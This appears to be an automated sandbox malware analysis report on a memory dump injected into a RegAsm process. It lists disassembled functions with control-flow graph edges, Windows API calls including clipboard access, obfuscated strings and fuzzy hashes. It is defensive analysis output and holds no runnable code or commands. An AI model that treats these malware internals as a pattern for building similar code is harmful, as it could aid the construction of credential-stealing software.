                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %sgh$2wD$4`[b$B{D$EBC
                                                                  • API String ID: 0-496620645
                                                                  • Opcode ID: 865e8d7a960f62aafbc96611e0bb75791c5df7bc6a7c9e46bf01ca827213b2f7
                                                                  • Instruction ID: 69e25fd42919f09a0fad1ce1aae30dbab7648f036e3687e99ce2e3a807c76338
                                                                  • Opcode Fuzzy Hash: 865e8d7a960f62aafbc96611e0bb75791c5df7bc6a7c9e46bf01ca827213b2f7
                                                                  • Instruction Fuzzy Hash: 782290B4D04206DFEB10DF94D8516BFBBB1FF0A315F140869E941AB352D3399852CBA8
                                                                  Function 0040EFFC Relevance: 6.8, Strings: 5, Instructions: 550COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 382 40effc 383 40effd-40f00c call 40f7e0 382->383 385 40f020 383->385 386 40f240-40f24f call 40fd50 383->386 387 40f220-40f237 call 40fd50 383->387 388 40f0c3-40f1d8 383->388 389 40f267 383->389 390 40f26c 383->390 391 40f030-40f03d 383->391 392 40f070-40f072 383->392 393 40f090 383->393 394 40f271-40f2da 383->394 395 40f076-40f07a 383->395 396 40f0b6-40f0bc 383->396 397 40f096-40f0a1 383->397 398 40f25d-40f260 383->398 385->391 437 40f254 386->437 387->386 427 40f21a 388->427 428 40f1da 388->428 389->390 390->394 420 40f061-40f06f 391->420 421 40f03f-40f043 391->421 392->395 393->397 418 40f31a-40f325 394->418 419 40f2dc-40f2df 394->419 395->386 395->387 395->388 395->389 395->390 395->393 395->394 395->396 395->397 395->398 396->386 396->387 396->388 396->389 396->390 396->394 396->398 397->396 422 40f0b0 397->422 423 40eeb0-40eecb call 440580 397->423 424 40ef70-40ef76 397->424 425 40eed4-40eedb 397->425 426 40eff8 397->426 398->389 398->394 401 40f440 398->401 402 40f540 398->402 403 40f5c0-40f5c7 398->403 404 40f520-40f528 398->404 405 40f442-40f447 398->405 406 40f542-40f54f 398->406 407 40f364-40f390 398->407 408 40f62e-40f64d call 444270 398->408 409 40f52f-40f53b 398->409 410 40f5af 398->410 411 40f430-40f438 398->411 412 40f570 398->412 413 40f5f2 398->413 414 40f572-40f5a7 398->414 415 40f493-40f4a2 398->415 416 40f5f4-40f601 398->416 417 40f556-40f55a 398->417 451 40f5d0-40f5d3 403->451 404->402 404->403 404->404 404->406 404->409 404->410 404->412 404->413 404->414 404->415 404->416 404->417 432 40f450-40f45a 405->432 406->403 406->404 406->410 406->412 406->414 406->417 429 40f392 407->429 430 40f3da-40f3e3 407->430 409->402 410->403 411->401 413->416 414->410 434 40f4b0-40f4b7 415->434 438 40f621-40f62a 416->438 439 40f603-40f607 416->439 417->412 443 40f350-40f352 418->443 444 40f327-40f32b 418->444 440 40f2e0-40f318 call 411720 419->440 420->392 433 40f050-40f05f 421->433 422->396 423->425 424->424 431 40ef78-40ef93 424->431 445 40eee0-40eee6 425->445 426->382 427->387 435 40f1e0-40f218 call 4116a0 428->435 446 40f3a0-40f3d8 call 4117a0 429->446 449 40f422-40f429 430->449 450 40f3e5-40f3ef 430->450 462 40efa0-40efc5 call 411420 431->462 432->432 452 40f45c-40f48c 432->452 433->420 433->433 434->434 456 40f4b9-40f4cf 434->456 435->427 437->398 438->408 453 40f610-40f61f 439->453 440->418 460 40f356-40f35d 443->460 458 40f337-40f33b 444->458 445->445 459 40eee8-40eefc 445->459 446->430 449->401 449->402 449->403 449->404 449->405 449->406 449->408 449->409 449->410 449->411 449->412 449->413 449->414 449->415 449->416 449->417 463 40f407-40f40b 450->463 467 40f5d6 451->467 452->402 452->403 452->404 452->406 452->409 452->410 452->412 452->413 452->414 452->415 452->416 452->417 453->438 453->453 464 40f4d5-40f4d9 456->464 465 40f5da-40f5eb call 40f7e0 456->465 470 40f354 458->470 471 40f33d-40f344 458->471 472 40ef4d-40ef52 459->472 473 40eefe-40ef07 459->473 460->401 460->402 460->403 460->404 460->405 460->406 460->407 460->408 460->409 460->410 460->411 460->412 460->413 460->414 460->415 460->416 460->417 496 40efc7-40efcd 462->496 497 40efcf-40efda 462->497 476 40f420 463->476 477 40f40d-40f414 463->477 479 40f4e0-40f4e4 464->479 465->402 465->403 465->404 465->406 465->410 465->412 465->413 465->414 465->416 465->417 467->465 470->460 480 40f346-40f348 471->480 481 40f34a 471->481 472->424 482 40ef10-40ef35 call 411420 473->482 476->449 484 40f416-40f418 477->484 485 40f41a 477->485 479->451 486 40f4ea-40f504 call 411420 479->486 480->481 488 40f330-40f335 481->488 489 40f34c-40f34e 481->489 502 40ef37-40ef3d 482->502 503 40ef3f-40ef45 482->503 484->485 492 40f400-40f405 485->492 493 40f41c-40f41e 485->493 500 40f506-40f50c 486->500 501 40f50e-40f514 486->501 488->458 488->460 489->488 492->449 492->463 493->492 496->462 496->497 497->426 500->479 500->501 501->467 502->482 502->503 503->472
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %!-0$:g;1$GA$j$yE
                                                                  • API String ID: 0-657862259
                                                                  • Opcode ID: 8daadd4c4eafb44f063823af2852c0169c47290188a28889f776968e4671cce3
                                                                  • Instruction ID: 0bf61b085e90676ab9422539f66e4567ca3ca80a6a34bc9c966370a20edcd352
                                                                  • Opcode Fuzzy Hash: 8daadd4c4eafb44f063823af2852c0169c47290188a28889f776968e4671cce3
                                                                  • Instruction Fuzzy Hash: BD02CE74108381CFD321DF14D4806ABB7E1BF9A309F044A3DE8C99B392E3799959CB5A
                                                                  Function 00447560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 504 447560-447592 LdrInitializeThunk
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(00444FF1,00000001,00000005,?,00000000,?,?,004214D5), ref: 0044758E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 7654$7654
                                                                  • API String ID: 2994545307-1888865020
                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                  Function 0044A7E0 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 505 44a7e0-44a7eb 506 44a7f0-44a7f9 505->506 506->506 507 44a7fb-44a80f 506->507 508 44a811-44a816 507->508 509 44a818 507->509 510 44a81f-44a847 call 40cac0 508->510 509->510 513 44a862-44a8e1 510->513 514 44a849-44a84f 510->514 516 44a916-44a921 513->516 517 44a8e3 513->517 515 44a850-44a860 514->515 515->513 515->515 519 44a975-44a987 call 40cad0 516->519 520 44a923-44a92b 516->520 518 44a8f0-44a914 call 44c200 517->518 518->516 523 44a930-44a937 520->523 526 44a940-44a946 523->526 527 44a939-44a93c 523->527 526->519 529 44a948-44a96b call 447560 526->529 527->523 528 44a93e 527->528 528->519 531 44a970-44a973 529->531 531->519
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: @$MNOP
                                                                  • API String ID: 2994545307-2234187807
                                                                  • Opcode ID: 383395a8c2557685db5440b8f2875ef8fac23426ad172215021297f230a7d1c8
                                                                  • Instruction ID: 80857ea081e9c0ef4e0b68a0f371812cde995d369360003f316b1ac55e0fae6d
                                                                  • Opcode Fuzzy Hash: 383395a8c2557685db5440b8f2875ef8fac23426ad172215021297f230a7d1c8
                                                                  • Instruction Fuzzy Hash: E441DEB15083009FE710DF58D885A2BBBE5FF85318F09892EE485CB2A2E379C914CB57
                                                                  Function 0040ED90 Relevance: 1.6, APIs: 1, Instructions: 87libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 532 40ed90-40edc2 533 40ee01-40ee45 532->533 534 40edc4 532->534 536 40ee76-40ee86 LoadLibraryExW call 445a90 533->536 537 40ee47 533->537 535 40edd0-40edff call 411620 534->535 535->533 543 40ee8b-40ee8e 536->543 539 40ee50-40ee74 call 4115a0 537->539 539->536 545 40ee95-40ee97 543->545 546 40ee9c 543->546 547 40f643-40f64d 545->547 546->547
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(E31BE117,00000000,191A131C), ref: 0040EE7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: b255b2b3df52fa8fefe507985d2cf18ad8c452aef6b15d87a3589c64d6e5f074
                                                                  • Instruction ID: 63d71ec5668dfa77f13543280154113270aaac174107f28ab34eb916c867471b
                                                                  • Opcode Fuzzy Hash: b255b2b3df52fa8fefe507985d2cf18ad8c452aef6b15d87a3589c64d6e5f074
                                                                  • Instruction Fuzzy Hash: 6C215A7410C3849BD311AF15D844A5FBBE5FB9A709F440E2EF1C8A7292C339D9148B6B
                                                                  Function 00444282 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 548 444282-444289 549 444290-4442ad 548->549 550 4442f0 548->550 551 444300 548->551 552 4442f2-4442fa 548->552 553 444302-444306 RtlFreeHeap 548->553 554 444308-44430c 548->554 555 4442d6-4442e3 549->555 556 4442af 549->556 550->552 551->553 552->551 553->554 555->550 557 4442b0-4442d4 call 447470 556->557 557->555
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 00444306
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 9b64c73a6e1149bfdb640a00ee75ce205078f54ff32e19d42aa46313119ccf0f
                                                                  • Instruction ID: 6bffe2fc0ddf8828133d19de1647fbd8cb8d601340a533239dc1377920776a1d
                                                                  • Opcode Fuzzy Hash: 9b64c73a6e1149bfdb640a00ee75ce205078f54ff32e19d42aa46313119ccf0f
                                                                  • Instruction Fuzzy Hash: 52012874608740AFD301EB59E8A0A2ABBE5AB8A701F14481CE4C487362C339DC50CB9A
                                                                  Function 00444200 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 560 444200-444218 561 444246-444260 RtlAllocateHeap 560->561 562 44421a 560->562 563 444220-444244 call 4473f0 562->563 563->561
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00444257
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 80a4013d8c0c1a4728d3e3860e27985b7f180d0faad403a50f6dae2b7d497ec6
                                                                  • Instruction ID: 3ae5f2f3d576169419d8a9ac17d01dbf57a201fe257bde1ca6e5dd96a0ad9e98
                                                                  • Opcode Fuzzy Hash: 80a4013d8c0c1a4728d3e3860e27985b7f180d0faad403a50f6dae2b7d497ec6
                                                                  • Instruction Fuzzy Hash: FAF0177410C2409BE601EB58E941A1EFBE5EB95701F44486DF9C487252D239E824DB67

                                                                  Non-executed Functions

                                                                  Function 004327B0 Relevance: 17.5, APIs: 2, Strings: 7, Instructions: 1749COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: drC$#JC$.L6j$>Wv$KJIg$vRTb$~PF<
                                                                  • API String ID: 0-3854151749
                                                                  • Opcode ID: b49086e5311dadaa935c078b0d22b8ac093333b5ead3b543180416bfd8a0cf4b
                                                                  • Instruction ID: 80dd1b3f92e3bf53a7d47459d3dbaa13194b9cb319ea6a1a27847e4a333d22a3
                                                                  • Opcode Fuzzy Hash: b49086e5311dadaa935c078b0d22b8ac093333b5ead3b543180416bfd8a0cf4b
                                                                  • Instruction Fuzzy Hash: 9BD27270405B808BE7318F35C490BA3BBE1AF1B306F58599ED4EB8B382D779A505CB65
                                                                  Function 00439000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100clipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                  • String ID: 3$?$e
                                                                  • API String ID: 2832541153-3975470078
                                                                  • Opcode ID: 9da8b1234222b0aafb8b3fc8940d2f88cb45ae5217a432052fd4da87163de2ca
                                                                  • Instruction ID: a9f521efd2a2c46b063ecbce395cbb1927191a562d08ac0c9302c0b51827cb25
                                                                  • Opcode Fuzzy Hash: 9da8b1234222b0aafb8b3fc8940d2f88cb45ae5217a432052fd4da87163de2ca
                                                                  • Instruction Fuzzy Hash: 0441A37540C3818ED311EF3CD48832FBFE09B96314F154A2EE4D996392C678894ACB67
                                                                  Function 0044004B Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 420COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Variant$ClearInit
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 4205145696-3675246634
                                                                  • Opcode ID: 9da582bd222a9aa3210a227d15e33794fc036b98df7b843830be9b90ece2603a
                                                                  • Instruction ID: c15c9a77a36a85870a6c8e83f66fe4480b167010d9fbe339181f0a578d0a5d72
                                                                  • Opcode Fuzzy Hash: 9da582bd222a9aa3210a227d15e33794fc036b98df7b843830be9b90ece2603a
                                                                  • Instruction Fuzzy Hash: 6BE1EE75A08301DFEB00CF68E881B6EBBB1FB8930AF14482DE985D7291D739D915CB59
                                                                  Function 0043FD0E Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 403memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID: ,/$4`[b$7654
                                                                  • API String ID: 2525500382-138038313
                                                                  • Opcode ID: 011e93b997d46e8870ce040462fe3f6284c17b45014897ad250b99d8540a381f
                                                                  • Instruction ID: 5c24870ec86159d0f6ecf84723dde93076e3ef2f57b7b7e0ddad74c94e93c31d
                                                                  • Opcode Fuzzy Hash: 011e93b997d46e8870ce040462fe3f6284c17b45014897ad250b99d8540a381f
                                                                  • Instruction Fuzzy Hash: F1E1D075A08301AFEB10CF64DC41B6EBBB1FB89305F14482DF685AB291D739D911CB5A
                                                                  Function 00401000 Relevance: 11.9, Strings: 8, Instructions: 1867COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
                                                                  • API String ID: 0-2771814109
                                                                  • Opcode ID: 60d91501b71ca20af355275aac5581bd6b324532a87e7822ac95ca22a7305489
                                                                  • Instruction ID: ddca72acc18f96ceca311f167404972c65106f1bd8c402654e553bdb633caa3b
                                                                  • Opcode Fuzzy Hash: 60d91501b71ca20af355275aac5581bd6b324532a87e7822ac95ca22a7305489
                                                                  • Instruction Fuzzy Hash: CCD2E3716083418FC714CE29C59436BBBE2ABC9314F18867EE899AB3D1D778DD05CB86
                                                                  Function 00427B0F Relevance: 10.8, Strings: 8, Instructions: 813COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -17E$7654$7654$=I# $?8N$QQ;%$r~B$E'I
                                                                  • API String ID: 0-3386696674
                                                                  • Opcode ID: 37c194b4809dd1c00137d7dc201101eebe92735c8c0e734b709c7d09f5c8d5e3
                                                                  • Instruction ID: 60540d3078bd233bb59da47371b54fb6625578c4cae607adf808edf17fed4755
                                                                  • Opcode Fuzzy Hash: 37c194b4809dd1c00137d7dc201101eebe92735c8c0e734b709c7d09f5c8d5e3
                                                                  • Instruction Fuzzy Hash: 1442CB71608311DFD714DF28E880A2AB7E2FF89715F49896DE8858B392D739EC01CB56
                                                                  Function 0041DD64 Relevance: 10.6, Strings: 8, Instructions: 613COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3_]$4`[b$4`[b$7654$8C-A$;[6Y$Vwvu${/}-
                                                                  • API String ID: 0-2602927754
                                                                  • Opcode ID: 307ad71cdb71838ec795c4dd14610299abfbd5c82a6174d8d007dc7da4c3e356
                                                                  • Instruction ID: ba1e9d66d155ef7e9119e1be78dddf6f3c512da5b59593db3145263a403de92d
                                                                  • Opcode Fuzzy Hash: 307ad71cdb71838ec795c4dd14610299abfbd5c82a6174d8d007dc7da4c3e356
                                                                  • Instruction Fuzzy Hash: C012ABB4600700DFC7248F25C891BA3B7F2FF46305F14885DE99A8B692D379E891CB99
                                                                  Function 004012A7 Relevance: 8.4, Strings: 6, Instructions: 940COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$0$0$@$i$u
                                                                  • API String ID: 0-2200626124
                                                                  • Opcode ID: ab89587f8a0daafa244c590f772caad168a2f81082220ddc44e8abb7ed779df5
                                                                  • Instruction ID: 0f02e483ae5546116cb6baed28d9e077716f17be131def69be1fd2f2fc950076
                                                                  • Opcode Fuzzy Hash: ab89587f8a0daafa244c590f772caad168a2f81082220ddc44e8abb7ed779df5
                                                                  • Instruction Fuzzy Hash: 1472F571A0C3428BD318CE28C58471BBBE1ABC5314F148A2EE8D9A73D1D7B8DD45CB86
                                                                  Function 0042C891 Relevance: 8.3, Strings: 6, Instructions: 837COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654$HK$cb`d$gzyi$vrhz
                                                                  • API String ID: 0-2685429167
                                                                  • Opcode ID: 424902dc72ab28ec9b7c09e577cb145ec8479a31a11f362cc29c796f7d8e5cc8
                                                                  • Instruction ID: 3f5d2fb8fb5b53038c321c487b2321c0e33df35c546daf2f5165b83ef3f83226
                                                                  • Opcode Fuzzy Hash: 424902dc72ab28ec9b7c09e577cb145ec8479a31a11f362cc29c796f7d8e5cc8
                                                                  • Instruction Fuzzy Hash: 3A42DCB1608350DFD7009F25E89162FBBE1EF8A349F54492EE4C597352D338D910CB5A
                                                                  Function 004204A0 Relevance: 6.9, Strings: 5, Instructions: 683COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ^G$`c$[Z]$su$wy
                                                                  • API String ID: 0-2730888924
                                                                  • Opcode ID: f07032dc12982def7a5bf2984774998718f875f43970d5821979900336bb7d63
                                                                  • Instruction ID: e474b29bb85a6c259ff07e14df36c9a08649fe6536d19ea1481a43bd88640b6a
                                                                  • Opcode Fuzzy Hash: f07032dc12982def7a5bf2984774998718f875f43970d5821979900336bb7d63
                                                                  • Instruction Fuzzy Hash: 5D2296B55083509FC700EF59E881A2FBBE0AF95358F488D1DF4D48B262D37AD944CB9A
                                                                  Function 0042BB00 Relevance: 6.7, Strings: 5, Instructions: 428COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$4`[b$7654$7654$L]
                                                                  • API String ID: 0-1286059558
                                                                  • Opcode ID: 757b9c9f247dd65a548c9dc266fa73467f186f5a48385a5314f930bee4029ea9
                                                                  • Instruction ID: 287429e8acf0308d46d64af027b8c2561fec00fe66fe95d8ce0ef9e28d63c3ce
                                                                  • Opcode Fuzzy Hash: 757b9c9f247dd65a548c9dc266fa73467f186f5a48385a5314f930bee4029ea9
                                                                  • Instruction Fuzzy Hash: DAE1ADB5608344DFE3209F25E881B2FB7E5FB85345F54882DEAC887252DB3AD910CB56
                                                                  Function 0040F7E0 Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: s$6$H$M|$rF
                                                                  • API String ID: 0-3047902030
                                                                  • Opcode ID: a0a9c5e50eae0b5be39a8be490fd2323b68d1735eebcbb5389087b95049dffa7
                                                                  • Instruction ID: afb9f173eede57e33b54f2f4df428e609b2eb683b10d7af656f29c121230f651
                                                                  • Opcode Fuzzy Hash: a0a9c5e50eae0b5be39a8be490fd2323b68d1735eebcbb5389087b95049dffa7
                                                                  • Instruction Fuzzy Hash: 40D17B7050C3809BD321DF18D49462FBBE5AB82744F18493EE8D56B392D339D949CBAB
                                                                  Function 004340F5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 452COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #,)$J(Z4
                                                                  • API String ID: 0-1033251941
                                                                  • Opcode ID: 71f396c22e8098a9a3ea3581ea4eb6afead878c0d08d22da93183c486a730162
                                                                  • Instruction ID: ee2a4b736eeb26dd3486e01a631b6fd6690cbdf8a78c7fccda172515344799a2
                                                                  • Opcode Fuzzy Hash: 71f396c22e8098a9a3ea3581ea4eb6afead878c0d08d22da93183c486a730162
                                                                  • Instruction Fuzzy Hash: E5F1D071604B40CBE7658F35D490BE7BBE2AB4A305F14886ED5EB87282CB39F505CB25
                                                                  Function 0042A345 Relevance: 4.3, Strings: 3, Instructions: 529COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,+$lk$;9
                                                                  • API String ID: 0-1734778162
                                                                  • Opcode ID: fb477b06c671ab3640e2d5caf1ace8f2a13c8c6b58880ea85eaf716b54e670fa
                                                                  • Instruction ID: c9bf8e021ae438ad3888fe5eaf2f287ab2778ae50bd9558bb26f3a013a9aec5c
                                                                  • Opcode Fuzzy Hash: fb477b06c671ab3640e2d5caf1ace8f2a13c8c6b58880ea85eaf716b54e670fa
                                                                  • Instruction Fuzzy Hash: E002A670608352CBC324DF28E58066BB3E1FF85745F98891EE8C587221E779D914DBAB
                                                                  Function 00426F20 Relevance: 4.2, Strings: 3, Instructions: 405COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654$defg
                                                                  • API String ID: 0-754973257
                                                                  • Opcode ID: fe4c2263e7f541097cd7e1276ef9b0ddbefc2d291b8011f9bdf8265acc152e94
                                                                  • Instruction ID: 5c7ae5f1a36bc8351c5dc06062275f31aaba2ea41b8746b841229fb7d44012db
                                                                  • Opcode Fuzzy Hash: fe4c2263e7f541097cd7e1276ef9b0ddbefc2d291b8011f9bdf8265acc152e94
                                                                  • Instruction Fuzzy Hash: C3C1AC716083209BD711EF14E881A2BB7E4EF95354F89095EF8C19B351E339D914CBAB
                                                                  Function 004450E0 Relevance: 3.1, Strings: 2, Instructions: 576COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7654$f
